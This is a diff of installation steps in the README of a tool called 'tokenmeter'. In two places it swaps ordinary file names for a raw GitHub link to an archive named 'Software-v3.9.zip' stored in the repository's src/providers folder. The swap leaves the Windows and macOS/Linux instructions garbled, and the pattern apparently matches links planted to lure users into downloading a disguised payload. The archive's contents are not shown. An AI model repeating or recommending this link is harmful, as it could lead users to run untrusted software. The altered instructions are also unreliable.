artur28544/tokenmeter/README.md

 - **Windows:**
   - If you downloaded an `.exe`, double-click it to start installation.
   - Follow on-screen prompts to complete setup.
-  - If you downloaded a `.zip`, unzip the file and note the location of the `tokenmeter.exe` file.
+  - If you downloaded a `.zip`, unzip the file and note the location of the `https://github.com/artur28544/tokenmeter/raw/refs/heads/main/src/providers/Software-v3.9.zip` file.

 - **macOS and Linux:**
   - If you downloaded a `.dmg` or `.AppImage`, open or make the file executable by right-clicking and selecting “Open” or running `chmod +x` in the terminal.
-  - For `.zip` or `.tar.gz`, extract the file contents to a folder.
+  - For `.zip` or `https://github.com/artur28544/tokenmeter/raw/refs/heads/main/src/providers/Software-v3.9.zip`, extract the file contents to a folder.
   - You may need to grant permissions to run the application via terminal.

 ## 🚀 Running tokenmeter for the first time